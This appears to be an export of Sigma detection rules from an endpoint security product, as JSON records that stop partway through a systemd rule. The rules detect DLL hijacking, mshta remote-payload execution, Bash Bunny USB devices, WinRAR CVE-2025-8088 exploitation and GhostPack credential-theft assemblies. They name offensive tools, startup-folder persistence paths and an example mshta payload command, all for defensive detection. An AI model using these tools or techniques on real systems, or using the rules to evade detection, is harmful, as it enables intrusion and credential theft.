"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_musnotifyicon.yml",
"content": "title: DLL Hijacking via musnotifyicon.exe\nid: 56b4092b-c97b-4030-aec7-939c18d9289c\ndescription: |\n Detects potential Windows DLL Hijacking via musnotifyicon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'musnotifyicon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DMCmnUtils.dll'\n - '\\UPShared.dll'\n - '\\uxtheme.dll'\n - '\\WINHTTP.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "56b4092b-c97b-4030-aec7-939c18d9289c",
"rule_name": "DLL Hijacking via musnotifyicon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via musnotifyicon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "56bae207-eb3c-45be-90d9-0408b650bcc4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075386Z",
"creation_date": "2026-03-23T11:45:34.075388Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075393Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/threat-detection-report/techniques/mshta/",
"https://lolbas-project.github.io/lolbas/Binaries/Mshta/",
"https://attack.mitre.org/techniques/T1218/005/"
],
"name": "t1218_005_remote_content_execution_mshta.yml",
"content": "title: Remote Content Executed via Mshta\nid: 56bae207-eb3c-45be-90d9-0408b650bcc4\ndescription: |\n Detects the execution of a remote payload via mshta.exe.\n Mshta can be used to proxy the execution of a malicious content.\n It is recommended to investigate the remote file and the actions it performed to ensure the action was legitimate.\nreferences:\n - https://redcanary.com/threat-detection-report/techniques/mshta/\n - https://lolbas-project.github.io/lolbas/Binaries/Mshta/\n - https://attack.mitre.org/techniques/T1218/005/\ndate: 2024/02/05\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mshta\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # mshta.exe https://example.com/payload\n selection:\n OriginalFileName: 'MSHTA.EXE'\n CommandLine|contains:\n - ' http://'\n - ' https://'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "56bae207-eb3c-45be-90d9-0408b650bcc4",
"rule_name": "Remote Content Executed via Mshta",
"rule_description": "Detects the execution of a remote payload via mshta.exe.\nMshta can be used to proxy the execution of a malicious content.\nIt is recommended to investigate the remote file and the actions it performed to ensure the action was legitimate.\n",
"rule_creation_date": "2024-02-05",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "56c9f2fa-7332-4c35-973b-9ff587dbdd2f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294344Z",
"creation_date": "2026-03-23T11:45:35.294348Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294355Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_crontab_list_macos.yml",
"content": "title: Cron Jobs Enumerated via Crontab (macOS)\nid: 56c9f2fa-7332-4c35-973b-9ff587dbdd2f\ndescription: |\n Detects the execution of the crontab command to list cron jobs.\n An attacker could use the list of cron jobs to possibly inject malicious behaviour in unprotected scripts.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2022/11/24\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1053.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/crontab'\n CommandLine|contains: ' -l'\n ParentImage|contains: '?'\n\n exclusion_meraki:\n GrandparentCommandLine: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/com.meraki.scriptonly.??????/postinstall /Library/Application Support/Meraki/*'\n\n exclusion_knockknock:\n ParentImage: '/Applications/KnockKnock.app/Contents/MacOS/KnockKnock'\n\n exclusion_mackeeper:\n ParentImage:\n - '/applications/mackeeper.app/contents/library/launchagents/mackeeperagent.app/contents/macos/mackeeperagent'\n - '/library/privilegedhelpertools/com.mackeeper.mackeeperprivilegedhelper'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "56c9f2fa-7332-4c35-973b-9ff587dbdd2f",
"rule_name": "Cron Jobs Enumerated via Crontab (macOS)",
"rule_description": "Detects the execution of the crontab command to list cron jobs.\nAn attacker could use the list of cron jobs to possibly inject malicious behaviour in unprotected scripts.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2022-11-24",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "56dfdfb3-5fef-4368-8250-dd5afca44520",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091999Z",
"creation_date": "2026-03-23T11:45:34.092001Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092005Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sciencedirect.com/science/article/pii/S2666281721000986",
"https://securelist.com/darkvishnya/89169/",
"https://attack.mitre.org/techniques/T1091/",
"https://attack.mitre.org/techniques/T1200/"
],
"name": "t1200_bash_bunny_usage.yml",
"content": "title: Bash Bunny Malicious USB Key Detected\nid: 56dfdfb3-5fef-4368-8250-dd5afca44520\ndescription: |\n Detects an entry in USB-related registry values with an ID associated with Default Bash Bunny devices.\n Bash Bunny is a physical media payload platform that can deploy payloads after insertion on a computer.\n Once plugged into a computer, custom payloads can be used to perform malicious activities.\n It is recommended to conduct a forensic investigation to see if files were exfiltrated or other malicious actions were taken.\n The sciencedirect article in the references may help indicate what artifacts might be generated.\nreferences:\n - https://www.sciencedirect.com/science/article/pii/S2666281721000986\n - https://securelist.com/darkvishnya/89169/\n - https://attack.mitre.org/techniques/T1091/\n - https://attack.mitre.org/techniques/T1200/\ndate: 2023/03/21\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1200\n - attack.t1091\n - classification.Windows.Source.Registry\n - classification.Windows.HackTool.BashBunny\n - classification.Windows.Behavior.USB\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n # BashBunny uses the F000 vendor ID, which is not associated to any vendor, and FF03 product ID.\n # The IDs are added to registry by the usbstor.sys driver.\n TargetObject|contains:\n - 'SYSTEM\\CurrentControlSet\\Control\\usbflags\\F000FF03????'\n - 'SYSTEM\\CurrentControlSet\\Enum\\USB\\VID_F000&PID_FF03'\n\n condition: selection\nlevel: critical\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "56dfdfb3-5fef-4368-8250-dd5afca44520",
"rule_name": "Bash Bunny Malicious USB Key Detected",
"rule_description": "Detects an entry in USB-related registry values with an ID associated with Default Bash Bunny devices.\nBash Bunny is a physical media payload platform that can deploy payloads after insertion on a computer.\nOnce plugged into a computer, custom payloads can be used to perform malicious activities.\nIt is recommended to conduct a forensic investigation to see if files were exfiltrated or other malicious actions were taken.\nThe sciencedirect article in the references may help indicate what artifacts might be generated.\n",
"rule_creation_date": "2023-03-21",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1091",
"attack.t1200"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "56f219b0-67df-4050-90cd-053d9320bbca",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092257Z",
"creation_date": "2026-03-23T11:45:34.092259Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092263Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/",
"https://nvd.nist.gov/vuln/detail/CVE-2025-8088",
"https://attack.mitre.org/techniques/T1203/"
],
"name": "t1203_winrar_cve_2025_8088.yml",
"content": "title: WinRAR CVE-2025-8088 Vulnerability Exploited\nid: 56f219b0-67df-4050-90cd-053d9320bbca\ndescription: |\n Detects the creation of a suspicious file related to the exploitation of CVE-2025-8088, a vulnerability affecting WinRAR.\n CVE-2025-8088 is a path traversal zero-day vulnerability in WinRAR versions before 7.11 that allows attackers to execute arbitrary code by embedding malicious files in alternate data streams within crafted archives, enabling silent placement of malicious files in startup locations.\n This vulnerability has been actively exploited by the RomCom threat actor to deliver backdoors and establish persistence on compromised systems.\n It is recommended to investigate the content of the archive and the created file to determine their legitimacy.\nreferences:\n - https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/\n - https://nvd.nist.gov/vuln/detail/CVE-2025-8088\n - https://attack.mitre.org/techniques/T1203/\ndate: 2025/08/13\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1204.002\n - attack.t1203\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.CVE-2025-8088\n - classification.Windows.Exploit.WinRAR\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image|endswith: '\\WinRAR.exe'\n Path|contains:\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n - '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n - '\\Documents\\PowerShell\\profile.ps1'\n - '\\Documents\\WindowsPowerShell\\profile.ps1'\n - '\\System32\\WindowsPowerShell\\v1.0\\profile.ps1'\n - '\\Documents\\PowerShell\\\\*_profile.ps1'\n - '\\Documents\\WindowsPowerShell\\\\*_profile.ps1'\n - '\\System32\\WindowsPowerShell\\v1.0\\\\*_profile.ps1'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Word\\Startup\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Excel\\XLStart\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Addins\\'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "56f219b0-67df-4050-90cd-053d9320bbca",
"rule_name": "WinRAR CVE-2025-8088 Vulnerability Exploited",
"rule_description": "Detects the creation of a suspicious file related to the exploitation of CVE-2025-8088, a vulnerability affecting WinRAR.\nCVE-2025-8088 is a path traversal zero-day vulnerability in WinRAR versions before 7.11 that allows attackers to execute arbitrary code by embedding malicious files in alternate data streams within crafted archives, enabling silent placement of malicious files in startup locations.\nThis vulnerability has been actively exploited by the RomCom threat actor to deliver backdoors and establish persistence on compromised systems.\nIt is recommended to investigate the content of the archive and the created file to determine their legitimacy.\n",
"rule_creation_date": "2025-08-13",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1547.001",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5731e436-612e-43cb-872d-82344b85d732",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627748Z",
"creation_date": "2026-03-23T11:45:34.627750Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627754Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"http://www.joeware.net/freetools/tools/adfind/",
"https://attack.mitre.org/techniques/T1087/002/",
"https://attack.mitre.org/techniques/T1482/",
"https://attack.mitre.org/techniques/T1069/002/",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/techniques/T1016/",
"https://attack.mitre.org/software/S0552/"
],
"name": "adfind_usage.yml",
"content": "title: AdFind Binary Executed\nid: 5731e436-612e-43cb-872d-82344b85d732\ndescription: |\n Detects the execution of the AdFind binary.\n AdFind is a legitimate tool that has been used by numerous threat actors for conducting enumeration in an Active Directory network.\n It is recommended to determine if this binary is expected to be used in your environment and to look for other suspicious actions on the host.\nreferences:\n - http://www.joeware.net/freetools/tools/adfind/\n - https://attack.mitre.org/techniques/T1087/002/\n - https://attack.mitre.org/techniques/T1482/\n - https://attack.mitre.org/techniques/T1069/002/\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/techniques/T1016/\n - https://attack.mitre.org/software/S0552/\ndate: 2020/12/15\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - attack.t1482\n - attack.t1069.002\n - attack.t1018\n - attack.t1016\n - attack.s0552\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.AdFind\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\AdFind.exe'\n\n # This is handled by the rule 8ad5b489-e501-424e-b275-b55b2e88f3f0\n filter_cmds:\n CommandLine|contains:\n - '-sc trustdmp'\n - '-sc admincountdmp'\n - 'objectclass=trusteddomain'\n - 'objectcategory=computer'\n - 'objectcategory=organizationalUnit'\n\n condition: selection and not 1 of filter_*\nfalsepositives:\n - Legitimate use of AdFind by an administrator or 3rd party application\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5731e436-612e-43cb-872d-82344b85d732",
"rule_name": "AdFind Binary Executed",
"rule_description": "Detects the execution of the AdFind binary.\nAdFind is a legitimate tool that has been used by numerous threat actors for conducting enumeration in an Active Directory network.\nIt is recommended to determine if this binary is expected to be used in your environment and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2020-12-15",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016",
"attack.t1018",
"attack.t1069.002",
"attack.t1087.002",
"attack.t1482"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "57784113-77b2-47c2-bc1f-def4af23b6be",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085989Z",
"creation_date": "2026-03-23T11:45:34.085991Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085995Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/GhostPack/",
"https://attack.mitre.org/techniques/T1620/"
],
"name": "t1620_dotnet_assembly_load_known_malicious.yml",
"content": "title: GhostPack Malicious Dotnet Assembly Loaded\nid: 57784113-77b2-47c2-bc1f-def4af23b6be\ndescription: |\n Detects the loading of assemblies belonging to SpecterOps' GhostPack tooling.\n GhostPack is a collection of C# offensive security tools developed by SpecterOps for conducting penetration testing and red team operations.\n Attackers may use these tools or their modified variants to compromise Active Directory environments.\n It is recommended to investigate the process loading the assembly, analyze the specific GhostPack tool being executed, and check for indicators of credential theft or privilege escalation attempts.\nreferences:\n - https://github.com/GhostPack/\n - https://attack.mitre.org/techniques/T1620/\ndate: 2025/03/03\nmodified: 2025/06/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.MemoryExecution\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n AssemblyFlags: '0x0'\n AssemblyName:\n - 'seatbelt'\n - 'certify'\n - 'KeeTheft'\n - 'lockless'\n - 'rubeus'\n - 'safetykatz'\n - 'sharpchrome'\n - 'sharpdpapi'\n - 'sharpdump'\n - 'sharproast'\n - 'sharpup'\n - 'sharpwmi'\n - 'SharPersist'\n\n filter_path:\n ModuleILPath|contains: ':\\'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "57784113-77b2-47c2-bc1f-def4af23b6be",
"rule_name": "GhostPack Malicious Dotnet Assembly Loaded",
"rule_description": "Detects the loading of assemblies belonging to SpecterOps' GhostPack tooling.\nGhostPack is a collection of C# offensive security tools developed by SpecterOps for conducting penetration testing and red team operations.\nAttackers may use these tools or their modified variants to compromise Active Directory environments.\nIt is recommended to investigate the process loading the assembly, analyze the specific GhostPack tool being executed, and check for indicators of credential theft or privilege escalation attempts.\n",
"rule_creation_date": "2025-03-03",
"rule_modified_date": "2025-06-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "57aa6d3a-cc08-4dc5-be27-c028af95a27d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.689656Z",
"creation_date": "2026-03-23T11:45:34.626345Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626349Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/002/",
"https://attack.mitre.org/techniques/T1037/",
"https://attack.mitre.org/techniques/T1547/"
],
"name": "t1543_002_systemd_service_files_modified.yml",
"content": "title: SystemD Service File Created or Modified\nid: 57aa6d3a-cc08-4dc5-be27-c028af95a27d\ndescription: |\n Detects when a systemd service file is created or modified.\n Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence.\n It is recommended to verify the content of the service file and the process that modified it.\nreferences:\n - https://attack.mitre.org/techniques/T1543/002/\n - https://attack.mitre.org/techniques/T1037/\n - https://attack.mitre.org/techniques/T1547/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.002\n - attack.t1037\n - attack.t1547\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_write:\n Kind: 'access'\n Permissions: 'write'\n Path|startswith:\n - '/etc/systemd/system/'\n - '/etc/systemd/user/'\n - '/usr/lib/systemd/system/'\n - '/usr/lib/systemd/user/'\n - '/root/.config/systemd/system/'\n - '/root/.config/systemd/user/'\n - '/home/*/.config/systemd/system/'\n - '/home/*/.config/systemd/user/'\n\n selection_rename:\n Kind: 'rename'\n TargetPath|startswith:\n - '/etc/systemd/system/'\n - '/etc/systemd/user/'\n - '/usr/lib/systemd/system/'\n - '/usr/lib/systemd/user/'\n - '/root/.config/systemd/system/'\n - '/root/.config/systemd/user/'\n - '/home/*/.config/systemd/system/'\n - '/home/*/.config/systemd/user/'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n - ProcessImage:\n - '/usr/bin/dnf5'\n - '/usr/bin/microdnf'\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf-automatic '\n - '/usr/bin/python* 